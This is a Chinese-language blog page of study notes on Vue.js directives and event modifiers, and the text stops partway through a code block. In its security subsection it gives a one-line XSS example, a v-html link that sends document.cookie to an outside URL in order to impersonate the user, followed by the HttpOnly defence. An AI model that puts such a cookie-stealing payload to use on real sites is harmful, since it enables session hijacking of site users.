<!doctype html>














<!-- `site.alt_lang` can specify a language different from the UI -->
<html lang="zh-CN" data-mode="light">
  <!-- The Head -->

<head>
  <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  <meta name="theme-color" media="(prefers-color-scheme: light)" content="#f7f7f7">
  <meta name="theme-color" media="(prefers-color-scheme: dark)" content="#1b1b1e">
  <meta name="apple-mobile-web-app-capable" content="yes">
  <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
  <meta
    name="viewport"
    content="width=device-width, user-scalable=no initial-scale=1, shrink-to-fit=no, viewport-fit=cover"
  >

  

  

  
    <!-- Begin Jekyll SEO tag v2.8.0 -->
<meta name="generator" content="Jekyll v4.3.2" />
<meta property="og:title" content="Vue指令" />
<meta name="author" content="张晓岸" />
<meta property="og:locale" content="zh_CN" />
<meta name="description" content="v-cloak" />
<meta property="og:description" content="v-cloak" />
<link rel="canonical" href="http://localhost:4000/posts/Vue%E6%8C%87%E4%BB%A4/" />
<meta property="og:url" content="http://localhost:4000/posts/Vue%E6%8C%87%E4%BB%A4/" />
<meta property="og:site_name" content="安置屋" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2023-10-14T00:00:00+08:00" />
<meta name="twitter:card" content="summary" />
<meta property="twitter:title" content="Vue指令" />
<script type="application/ld+json">
{"@context":"https://schema.org","@type":"BlogPosting","author":{"@type":"Person","name":"张晓岸"},"dateModified":"2023-10-14T00:00:00+08:00","datePublished":"2023-10-14T00:00:00+08:00","description":"v-cloak","headline":"Vue指令","mainEntityOfPage":{"@type":"WebPage","@id":"http://localhost:4000/posts/Vue%E6%8C%87%E4%BB%A4/"},"url":"http://localhost:4000/posts/Vue%E6%8C%87%E4%BB%A4/"}</script>
<!-- End Jekyll SEO tag -->

  

  <title>Vue指令 | 安置屋
  </title>

  <!--
  The Favicons for Web, Android, Microsoft, and iOS (iPhone and iPad) Apps
  Generated by: https://realfavicongenerator.net/
-->



<link rel="apple-touch-icon" sizes="180x180" href="/assets/img/favicons/apple-touch-icon.png">
<link rel="icon" type="image/png" sizes="32x32" href="/assets/img/favicons/favicon-32x32.png">
<link rel="icon" type="image/png" sizes="16x16" href="/assets/img/favicons/favicon-16x16.png">
<link rel="manifest" href="/assets/img/favicons/site.webmanifest">
<link rel="shortcut icon" href="/assets/img/favicons/favicon.ico">
<meta name="apple-mobile-web-app-title" content="安置屋">
<meta name="application-name" content="安置屋">
<meta name="msapplication-TileColor" content="#da532c">
<meta name="msapplication-config" content="/assets/img/favicons/browserconfig.xml">
<meta name="theme-color" content="#ffffff">


  
    
      <link rel="preconnect" href="https://fonts.googleapis.com" >
      <link rel="dns-prefetch" href="https://fonts.googleapis.com" >
    
      <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
      <link rel="dns-prefetch" href="https://fonts.gstatic.com" crossorigin>
    
      <link rel="preconnect" href="https://fonts.googleapis.com" >
      <link rel="dns-prefetch" href="https://fonts.googleapis.com" >
    
      <link rel="preconnect" href="https://cdn.jsdelivr.net" >
      <link rel="dns-prefetch" href="https://cdn.jsdelivr.net" >
    

    <link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Lato&family=Source+Sans+Pro:wght@400;600;700;900&display=swap">
  

  <!-- GA -->
  

  <!-- Bootstrap -->
  <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.2/dist/css/bootstrap.min.css">

  <!-- Font Awesome -->
  <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@6.4.2/css/all.min.css">

  <link rel="stylesheet" href="/assets/css/jekyll-theme-chirpy.css">

  
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/tocbot@4.21.2/dist/tocbot.min.css">
  

  
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/loading-attribute-polyfill@2.1.1/dist/loading-attribute-polyfill.min.css">
  

  
    <!-- Manific Popup -->
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/magnific-popup@1.1.0/dist/magnific-popup.min.css">
  

  <!-- JavaScript -->

  

  <!-- A placeholder to allow defining custom metadata -->

</head>


  <body>
    <!--
 * @Author: 张晓岸
 * @Date: 2023-10-10 20:47:06
 * @LastEditTime: 2023-12-31 18:51:03
 * @LastEditors: 张晓岸
 * @Description: Do not edit
 * @FilePath: \jekyll-theme-chirpy\_includes\sidebar.html
 * @Company: Do not edit
-->
<!-- The Side Bar -->

<aside aria-label="Sidebar" id="sidebar" class="d-flex flex-column align-items-end">
  <header class="profile-wrapper">
    <a href="/" id="avatar" class="rounded-circle">
      
        
        <img src="http://127.0.0.1:4000//assets/img/avatar/doraemon.jpg" width="112" height="112" alt="avatar" onerror="this.style.display='none'">
      
    </a>

    <h1 class="site-title">
      <a href="/">安置屋</a>
    </h1>
    <p class="site-subtitle fst-italic mb-0">学习笔记外置站</p>
  </header>
  <!-- .profile-wrapper -->

  <nav class="flex-column flex-grow-1 w-100 ps-0">
    <ul class="nav">
      <!-- home -->
      <li class="nav-item">
        <a href="/" class="nav-link">
          <i class="fa-fw fas fa-home"></i>
          <span>首页</span>
        </a>
      </li>
      <!-- the real tabs -->
      
        <li class="nav-item">
          <a href="/categories/" class="nav-link">
            <i class="fa-fw fas fa-stream"></i>
            

            <span>分类</span>
          </a>
        </li>
        <!-- .nav-item -->
      
        <li class="nav-item">
          <a href="/tags/" class="nav-link">
            <i class="fa-fw fas fa-tags"></i>
            

            <span>标签</span>
          </a>
        </li>
        <!-- .nav-item -->
      
        <li class="nav-item">
          <a href="/archives/" class="nav-link">
            <i class="fa-fw fas fa-archive"></i>
            

            <span>归档</span>
          </a>
        </li>
        <!-- .nav-item -->
      
        <li class="nav-item">
          <a href="/about/" class="nav-link">
            <i class="fa-fw fas fa-info-circle"></i>
            

            <span>关于</span>
          </a>
        </li>
        <!-- .nav-item -->
      
    </ul>
  </nav>

  <div class="sidebar-bottom d-flex flex-wrap  align-items-center w-100">
    

    
      
      <!-- <a href="/" id="avatar" class="rounded-circle">
        
          
          <img src="http://127.0.0.1:4000//assets/img/avatar/doraemon.jpg" width="112" height="112" alt="avatar" onerror="this.style.display='none'">
        
      </a> -->
      
        <a
          href="https://github.com/Bug421-GIT"
          aria-label="github"
          

          
            target="_blank"
            
          

          

          
            rel="noopener noreferrer"
          
        >
          <i class="fab fa-github"></i>
        </a>
      
    
      
      <!-- <a href="/" id="avatar" class="rounded-circle">
        
          
          <img src="http://127.0.0.1:4000//assets/img/avatar/doraemon.jpg" width="112" height="112" alt="avatar" onerror="this.style.display='none'">
        
      </a> -->
      
        <a
          href="javascript:location.href = 'mailto:' + ['57689675','qq.com'].join('@')"
          aria-label="email"
          

          

          

          
        >
          <i class="fas fa-envelope"></i>
        </a>
      
    
      
      <!-- <a href="/" id="avatar" class="rounded-circle">
        
          
          <img src="http://127.0.0.1:4000//assets/img/avatar/doraemon.jpg" width="112" height="112" alt="avatar" onerror="this.style.display='none'">
        
      </a> -->
      
        <a
          href=""
          aria-label="weixin"
          

          
            target="_blank"
            
          

          

          
            rel="noopener noreferrer"
          
        >
          <i class="fa-brands fa-weixin"></i>
        </a>
      
    
      
      <!-- <a href="/" id="avatar" class="rounded-circle">
        
          
          <img src="http://127.0.0.1:4000//assets/img/avatar/doraemon.jpg" width="112" height="112" alt="avatar" onerror="this.style.display='none'">
        
      </a> -->
      
        <a
          href="https://weibo.com/u/1960838465"
          aria-label="weixin"
          

          
            target="_blank"
            
          

          

          
            rel="noopener noreferrer"
          
        >
          <i class="fa-brands fa-weibo"></i>
        </a>
      
    
  </div>
  <!-- .sidebar-bottom -->
</aside>
<!-- #sidebar -->


    <div id="main-wrapper" class="d-flex justify-content-center">
      <div class="container d-flex flex-column px-xxl-5">
        <!-- The Top Bar -->

<header id="topbar-wrapper" aria-label="Top Bar">
  <div
    id="topbar"
    class="d-flex align-items-center justify-content-between px-lg-3 h-100"
  >
    <nav id="breadcrumb" aria-label="Breadcrumb">
      

      
        
          
            <span>
              <a href="/">
                首页
              </a>
            </span>

          
        
          
        
          
            
              <span>Vue指令</span>
            

          
        
      
    </nav>
    <!-- endof #breadcrumb -->

    <button type="button" id="sidebar-trigger" class="btn btn-link">
      <i class="fas fa-bars fa-fw"></i>
    </button>

    <div id="topbar-title">
      文章
    </div>

    <button type="button" id="search-trigger" class="btn btn-link">
      <i class="fas fa-search fa-fw"></i>
    </button>

    <search class="align-items-center ms-3 ms-lg-0">
      <i class="fas fa-search fa-fw"></i>
      <input
        class="form-control"
        id="search-input"
        type="search"
        aria-label="search"
        autocomplete="off"
        placeholder="搜索..."
      >
    </search>
    <button type="button" class="btn btn-link text-decoration-none" id="search-cancel">取消</button>
  </div>
</header>


        <div class="row flex-grow-1">
          <main aria-label="Main Content" class="col-12 col-lg-11 col-xl-9 px-md-4">
            
              <!-- Refactor the HTML structure -->



<!--
  In order to allow a wide table to scroll horizontally,
  we suround the markdown table with `<div class="table-wrapper">` and `</div>`
-->



<!--
  Fixed kramdown code highlight rendering:
  https://github.com/penibelst/jekyll-compress-html/issues/101
  https://github.com/penibelst/jekyll-compress-html/issues/71#issuecomment-188144901
-->



<!-- Change the icon of checkbox -->



<!-- Handle images -->




  
  

  <!-- CDN URL -->
  

  <!-- Add image path -->
  

  
    
      
      
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  

  


<!-- Add header for code snippets -->



<!-- Create heading anchors -->





  
  

  
    
    

    
      
        
        
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    

    
  

  
  

  
    
    

    
      
        
        
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    

    
  

  
  

  

  
  

  




<!-- return -->




<article class="px-1">
  <header>
    <h1 data-toc-skip>Vue指令</h1>

    <div class="post-meta text-muted">
      <!-- published date -->
      <span>
        发表于
        <!--
  Date format snippet
  See: ${JS_ROOT}/utils/locale-dateime.js
-->




<time
  
  data-ts="1697212800"
  data-df="YYYY/MM/DD"
  
    data-bs-toggle="tooltip" data-bs-placement="bottom"
  
>
  2023/10/14
</time>

      </span>

      <!-- lastmod date -->
      

      

      <div class="d-flex justify-content-between">
        <!-- author(s) -->
        <span>
          

          作者

          <em>
            
              
                <a href="">张晓岸</a>
                
              
            
          </em>
        </span>

        <!-- read time -->
        <!-- Calculate the post's reading time, and display the word count in tooltip -->



<!-- words per minute -->










<!-- return element -->
<span
  class="readtime"
  data-bs-toggle="tooltip"
  data-bs-placement="bottom"
  title="3365 字"
>
  <em>18 分钟</em>阅读</span>

      </div>
      <!-- .d-flex -->
    </div>
    <!-- .post-meta -->
  </header>

  <div class="content">
    <h2 id="v-cloak"><span class="me-2">v-cloak</span><a href="#v-cloak" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>

<p>​	外部js脚本引入的 位置，会影响加载的顺序；<code class="language-plaintext highlighter-rouge">v-cloak</code>阻止未经加载完的结构渲染到页面上</p>

<ul>
  <li>添加了<code class="language-plaintext highlighter-rouge">v-cloak</code>的元素，在Vue.js 实例创建、加载完成后，将去除这个<code class="language-plaintext highlighter-rouge">v-cloak</code> 属性</li>
  <li>所有可以在DIV上添加<code class="language-plaintext highlighter-rouge">v-cloak</code>使其在为加载完时 <code class="language-plaintext highlighter-rouge">[v-cloak]:{display:none}</code> 隐藏其存在</li>
  <li>而加载完后，去除了这个属性，DIV就露出来了</li>
</ul>

<h2 id="v-once"><span class="me-2">v-once</span><a href="#v-once" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>

<p>​	只读取 元素的初始值，即第一次取的值</p>

<ul>
  <li><code class="language-plaintext highlighter-rouge">v-once</code>所在节点，在初次动态渲染后，就视为静态内容</li>
  <li>所以数据的改变不会引起所在节点的更新，可以用于优化性能</li>
</ul>

<h2 id="v-pre"><span class="me-2">v-pre</span><a href="#v-pre" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>

<p>​	Vue跳过所在节点的编译</p>

<ul>
  <li>应用于没有指令语法、没有使用插值语法的节点，会加快编译</li>
</ul>

<h2 id="内容绑定"><span class="me-2">内容绑定</span><a href="#内容绑定" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>

<h3 id="v-text"><span class="me-2">V-text</span><a href="#v-text" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3>

<ul>
  <li>v-text指令的作用是：设置标签的内容（textContent）[类似innerText]</li>
  <li>默认写法会 <u>替换全部内容</u>，使用差值表达式<code class="language-plaintext highlighter-rouge">{{ }}</code>可以替换指定内容</li>
  <li>设置标签的内容 （以字符串，全部输出），支持表达式</li>
</ul>

<h3 id="v-html"><span class="me-2">V-html</span><a href="#v-html" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3>

<ul>
  <li>v-html指令的作用是：设置元素的innerHTML</li>
  <li>内容中有htm结构，会被解析为标签</li>
  <li>v-text指令无论内容是什么，只会解析为文本</li>
</ul>

<ol>
  <li>部分替换标签内容: <code class="language-plaintext highlighter-rouge">{{ }}</code>这种写法</li>
  <li><u>全部替换</u> 标签内容: v-text和x-html</li>
</ol>

<p><strong>解析文本使用v-text，解析html结构使用v-html</strong></p>

<h3 id="安全性问题"><span class="me-2">安全性问题</span><a href="#安全性问题" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3>

<ol>
  <li>
    <p>在网站上动态渲染任意的HTML都是非常危险的，容易导致XSS攻击</p>
  </li>
  <li>
    <p><code class="language-plaintext highlighter-rouge">v-html:'&lt;a href=javascript:location.href="http://www.baidu.com?"+document.cookis&gt;&lt;/a&gt;</code></p>

    <p>在页面上获取 cookie，并携带跳转，将伪装登录</p>
  </li>
  <li>
    <p>浏览器保护机制：cookie 设置 <code class="language-plaintext highlighter-rouge">HttpOnly</code> — 只有 http协议才可以读取的cookie值</p>
  </li>
</ol>

<h2 id="事件处理"><span class="me-2">事件处理</span><a href="#事件处理" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>

<h3 id="绑定-v-on"><span class="me-2">绑定 v-on:</span><a href="#绑定-v-on" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3>

<div class="language-js highlighter-rouge"><div class="code-header">
        <span data-label-text="JavaScript"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="已复制！"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
</pre></td><td class="rouge-code"><pre><span class="k">new</span> <span class="nc">Vue</span><span class="p">({</span>
    <span class="na">methods</span><span class="p">:{</span>
        <span class="nf">functionName</span><span class="p">(</span><span class="nx">even</span><span class="p">){</span>
            <span class="c1">// 第一个参数 默认是【点击事件】</span>
            <span class="c1">// this是 调用者vm</span>
        <span class="p">},</span>
        <span class="na">functionName2</span><span class="p">:(</span><span class="nx">event</span><span class="p">)</span> <span class="o">=&gt;</span> <span class="p">{</span>
            <span class="c1">// 第一个参数 默认是【点击事件】</span>
            <span class="c1">// this是 调用者window -- 不应该</span>
        <span class="p">}</span>
        <span class="nf">functionName3</span><span class="p">(</span><span class="nx">a</span><span class="p">,</span><span class="nx">event</span><span class="p">){</span>
            <span class="c1">// 第一个参数 是传递的参数</span>
    		<span class="c1">// 第二个参数 是点击事件</span>
            <span class="c1">// this是 调用者vm、组件对象</span>
        <span class="p">}</span>
    <span class="p">}</span>
<span class="p">})</span>

<span class="o">&lt;</span><span class="nx">button</span> <span class="nx">v</span><span class="o">-</span><span class="nx">on</span><span class="p">:</span><span class="nx">click</span><span class="o">=</span><span class="dl">"</span><span class="s2">functionName</span><span class="dl">"</span><span class="o">&gt;</span> <span class="nx">点击按钮</span><span class="err">，</span><span class="nx">调用函数</span> <span class="o">&lt;</span><span class="sr">/button</span><span class="err">&gt;
</span><span class="o">&lt;</span><span class="nx">button</span> <span class="p">@</span><span class="nd">click</span><span class="o">=</span><span class="dl">"</span><span class="s2">functionName3(555,$event)</span><span class="dl">"</span><span class="o">&gt;</span> <span class="nx">点击按钮</span><span class="err">，</span><span class="nx">调用函数</span> <span class="o">&lt;</span><span class="sr">/button</span><span class="err">&gt;
</span></pre></td></tr></tbody></table></code></div></div>

<ul>
  <li>
    <p>所有被Vue管理的函数，都应该是普通函数</p>
  </li>
  <li>
    <p><code class="language-plaintext highlighter-rouge">v-on:</code>元素绑定事件</p>
  </li>
  <li>
    <p>事件名不需要写on，指令可以简写为<code class="language-plaintext highlighter-rouge">@click</code>,<code class="language-plaintext highlighter-rouge">@dblclick</code></p>
  </li>
  <li>
    <p>绑定的方法定义在methods属性中</p>

    <p>事件绑定可写为函数调用形式，可传入自定义参数</p>
  </li>
  <li>
    <p><u>给谁绑定，找谁触发</u></p>
  </li>
</ul>

<h3 id="事件修饰符"><span class="me-2">事件修饰符</span><a href="#事件修饰符" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3>

<p>​	事件修饰符可以连着写，顺序执行：	<code class="language-plaintext highlighter-rouge">@click().prevent.stop</code></p>

<ol>
  <li><strong>阻止默认事件  <code class="language-plaintext highlighter-rouge">.prevent</code></strong></li>
</ol>

<div class="language-html highlighter-rouge"><div class="code-header">
        <span data-label-text="HTML"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="已复制！"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
</pre></td><td class="rouge-code"><pre><span class="nt">&lt;div</span> <span class="na">id=</span><span class="s">"root"</span><span class="nt">&gt;</span>
    <span class="nt">&lt;a</span> <span class="na">href=</span><span class="s">"http://baidu.com"</span> <span class="err">@</span><span class="na">click=</span><span class="s">"showInfo"</span><span class="nt">&gt;</span>点我显示提示信息<span class="nt">&lt;/a&gt;</span>
    <span class="c">&lt;!-- 2. 事件修饰符.prevent 阻止默认事件 --&gt;</span> 
    <span class="nt">&lt;a</span> <span class="na">href=</span><span class="s">"http://baidu.com"</span> <span class="err">@</span><span class="na">click.prevent=</span><span class="s">"showInfo"</span><span class="nt">&gt;</span>点我显示提示信息<span class="nt">&lt;/a&gt;</span>
<span class="nt">&lt;/div&gt;</span>
</pre></td></tr></tbody></table></code></div></div>

<div class="language-js highlighter-rouge"><div class="code-header">
        <span data-label-text="JavaScript"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="已复制！"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
</pre></td><td class="rouge-code"><pre><span class="kd">const</span> <span class="nx">vm</span> <span class="o">=</span>  <span class="k">new</span> <span class="nc">Vue</span><span class="p">({</span>
    <span class="na">el</span><span class="p">:</span><span class="dl">'</span><span class="s1">#root</span><span class="dl">'</span><span class="p">,</span>
    <span class="na">methods</span><span class="p">:{</span>
        <span class="nf">showInfo</span><span class="p">(</span><span class="nx">e</span><span class="p">){</span>
            <span class="nx">e</span><span class="p">.</span><span class="nf">preventDefault</span><span class="p">();</span> <span class="c1">// 1. 阻止 默认事件（原生写法）</span>
            <span class="nf">alert</span><span class="p">(</span><span class="dl">"</span><span class="s2">hello!</span><span class="dl">"</span><span class="p">)</span>
        <span class="p">}</span>
    <span class="p">}</span>
<span class="p">})</span>
</pre></td></tr></tbody></table></code></div></div>

<ol>
  <li>
    <p>阻止事件冒泡 <code class="language-plaintext highlighter-rouge">.stop</code></p>

    <p>事件冒泡：父节点和子节点同有事件，点击子节点时，事件会向父级一级一级（相同事件）发生，直至根节点。（冒泡是向外发生的，但触发的target依然是子节点）</p>
  </li>
</ol>

<div class="language-html highlighter-rouge"><div class="code-header">
        <span data-label-text="HTML"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="已复制！"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
</pre></td><td class="rouge-code"><pre><span class="nt">&lt;div</span> <span class="na">id=</span><span class="s">"root"</span> <span class="err">@</span><span class="na">click=</span><span class="s">"showInfo"</span><span class="nt">&gt;</span>
    <span class="nt">&lt;button</span> <span class="err">@</span><span class="na">click=</span><span class="s">"showInfo"</span><span class="nt">&gt;</span>点我 <span class="nt">&lt;/button&gt;</span>
    <span class="c">&lt;!-- 2. 事件修饰符.stop 阻止冒泡事件: 给子元素加 --&gt;</span> 
    <span class="nt">&lt;button</span> <span class="err">@</span><span class="na">click.stop=</span><span class="s">"showInfo"</span><span class="nt">&gt;</span>点我 <span class="nt">&lt;/button&gt;</span>
<span class="nt">&lt;/div&gt;</span>
</pre></td></tr></tbody></table></code></div></div>

<div class="language-js highlighter-rouge"><div class="code-header">
        <span data-label-text="JavaScript"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="已复制！"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
</pre></td><td class="rouge-code"><pre><span class="kd">const</span> <span class="nx">vm</span> <span class="o">=</span>  <span class="k">new</span> <span class="nc">Vue</span><span class="p">({</span>
    <span class="na">el</span><span class="p">:</span><span class="dl">'</span><span class="s1">#root</span><span class="dl">'</span><span class="p">,</span>
    <span class="na">methods</span><span class="p">:{</span>
        <span class="nf">showInfo</span><span class="p">(</span><span class="nx">e</span><span class="p">){</span>
            <span class="nx">e</span><span class="p">.</span><span class="nf">stopPropagation</span><span class="p">();</span> <span class="c1">// 1. 阻止 冒泡事件（原生写法）</span>
            <span class="nf">alert</span><span class="p">(</span><span class="dl">"</span><span class="s2">hello!</span><span class="dl">"</span><span class="p">)</span>
        <span class="p">}</span>
    <span class="p">}</span>
<span class="p">})</span>
</pre></td></tr></tbody></table></code></div></div>

<ol>
  <li><strong>事件只触发一次 <code class="language-plaintext highlighter-rouge">.once</code></strong></li>
</ol>

<div class="language-html highlighter-rouge"><div class="code-header">
        <span data-label-text="HTML"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="已复制！"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
</pre></td><td class="rouge-code"><pre><span class="nt">&lt;div</span> <span class="na">id=</span><span class="s">"root"</span> <span class="err">@</span><span class="na">click=</span><span class="s">"showInfo"</span><span class="nt">&gt;</span>
    <span class="nt">&lt;button</span> <span class="err">@</span><span class="na">click.once=</span><span class="s">"showInfo"</span><span class="nt">&gt;</span>点我 <span class="nt">&lt;/button&gt;</span>
<span class="nt">&lt;/div&gt;</span>
</pre></td></tr></tbody></table></code></div></div>

<ol>
  <li>
    <p><strong>使用事件的捕获阶段 <code class="language-plaintext highlighter-rouge">.capture</code></strong></p>

    <p>事件捕获：父节点和子节点同有事件，点击子节点时，是从父节点一级一级向内捕获目标元素的。（捕获是向内的）</p>

    <p>在捕获期间就处理事件 — 向父级、再子级</p>
  </li>
</ol>

<div class="language-html highlighter-rouge"><div class="code-header">
        <span data-label-text="HTML"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="已复制！"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
</pre></td><td class="rouge-code"><pre><span class="nt">&lt;div</span> <span class="na">id=</span><span class="s">"root"</span><span class="nt">&gt;</span>
    <span class="nt">&lt;div</span> <span class="na">class=</span><span class="s">"box1"</span> <span class="err">@</span><span class="na">click.capture=</span><span class="s">"showMsg(1)"</span><span class="nt">&gt;</span> // 加了.capture后，打印 1 2
        div1
        <span class="nt">&lt;div</span> <span class="na">class=</span><span class="s">"box2"</span> <span class="err">@</span><span class="na">click=</span><span class="s">"showMsg(2)"</span><span class="nt">&gt;</span>div2<span class="nt">&lt;/div&gt;</span> // 点击div2，打印 2 1
    <span class="nt">&lt;/div&gt;</span>
<span class="nt">&lt;/div&gt;</span>
</pre></td></tr></tbody></table></code></div></div>

<div class="language-js highlighter-rouge"><div class="code-header">
        <span data-label-text="JavaScript"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="已复制！"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
</pre></td><td class="rouge-code"><pre><span class="kd">const</span> <span class="nx">vm</span> <span class="o">=</span> <span class="k">new</span> <span class="nc">Vue</span><span class="p">({</span>
    <span class="na">el</span><span class="p">:</span> <span class="dl">'</span><span class="s1">#root</span><span class="dl">'</span><span class="p">,</span>
    <span class="na">methods</span><span class="p">:</span> <span class="p">{</span>
        <span class="nf">showMsg</span><span class="p">(</span><span class="nx">value</span><span class="p">)</span> <span class="p">{</span>
            <span class="nx">console</span><span class="p">.</span><span class="nf">log</span><span class="p">(</span><span class="nx">value</span><span class="p">);</span>
        <span class="p">}</span>
    <span class="p">}</span>
<span class="p">})</span>
</pre></td></tr></tbody></table></code></div></div>

<ol>
  <li><strong>只有<code class="language-plaintext highlighter-rouge">event.target</code>是当前的元素，才可以触发<code class="language-plaintext highlighter-rouge">click</code>的事件  <code class="language-plaintext highlighter-rouge">.self</code></strong></li>
</ol>

<div class="language-html highlighter-rouge"><div class="code-header">
        <span data-label-text="HTML"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="已复制！"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
</pre></td><td class="rouge-code"><pre><span class="nt">&lt;div</span> <span class="na">id=</span><span class="s">"root"</span> <span class="err">@</span><span class="na">click.self=</span><span class="s">"showInfo($event,1)"</span><span class="nt">&gt;</span> // 有self时，1 2
    <span class="nt">&lt;button</span> <span class="err">@</span><span class="na">click=</span><span class="s">"showInfo($event,2)"</span><span class="nt">&gt;</span>点我 <span class="nt">&lt;/button&gt;</span>  // 没有self时，2 1
<span class="nt">&lt;/div&gt;</span>
</pre></td></tr></tbody></table></code></div></div>

<div class="language-js highlighter-rouge"><div class="code-header">
        <span data-label-text="JavaScript"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="已复制！"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
</pre></td><td class="rouge-code"><pre><span class="kd">const</span> <span class="nx">vm</span> <span class="o">=</span> <span class="k">new</span> <span class="nc">Vue</span><span class="p">({</span>
    <span class="na">el</span><span class="p">:</span><span class="dl">"</span><span class="s2">#root</span><span class="dl">"</span><span class="p">,</span>
    <span class="na">data</span><span class="p">:{},</span>
    <span class="na">methods</span><span class="p">:{</span>
        <span class="nf">showInfo</span><span class="p">(</span><span class="nx">e</span><span class="p">,</span><span class="nx">value</span><span class="p">){</span>
            <span class="nx">console</span><span class="p">.</span><span class="nf">log</span><span class="p">(</span><span class="nx">e</span><span class="p">.</span><span class="nx">target</span><span class="p">,</span><span class="nx">value</span><span class="p">);</span>
        <span class="p">}</span>
    <span class="p">}</span>
<span class="p">})</span>
</pre></td></tr></tbody></table></code></div></div>

<ol>
  <li>
    <p><strong>事件默认行为立即执行，无需等待事件回调  <code class="language-plaintext highlighter-rouge">.passive</code></strong></p>

    <p>一般情况下，事件触发后，处理完成，才会再回来执行新的触发事件 — 移动端项目使用较多</p>
  </li>
</ol>

<h3 id="键盘和鼠标事件"><span class="me-2">键盘和鼠标事件</span><a href="#键盘和鼠标事件" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3>

<ol>
  <li>鼠标事件： <code class="language-plaintext highlighter-rouge">@Wheel</code>— 鼠标滚轮</li>
  <li>键盘事件：
    <ol>
      <li>keydown：在键盘上按下某个键时触发。
        <ul>
          <li>如果按住某个键，会不断触发该事件，</li>
          <li>该事件处理函数返回 false 时，会取消默认的动作（如输入的键盘字符，在 IE 和 Safari 浏览器下还会禁止keypress 事件响应）。</li>
        </ul>
      </li>
      <li>keypress：按下某个键盘键并释放时触发。
        <ul>
          <li>如果按住某个键，会不断触发该事件。</li>
          <li>该事件处理函数返回 false 时，会取消默认的动作（如输入的键盘字符）。</li>
        </ul>
      </li>
      <li>keyup：释放某个键盘键时触发。
        <ul>
          <li>该事件仅在松开键盘时触发一次，不是一个持续的响应状态。</li>
        </ul>
      </li>
    </ol>
  </li>
  <li>在键盘输入某个值时，触发函数</li>
</ol>

<div class="language-html highlighter-rouge"><div class="code-header">
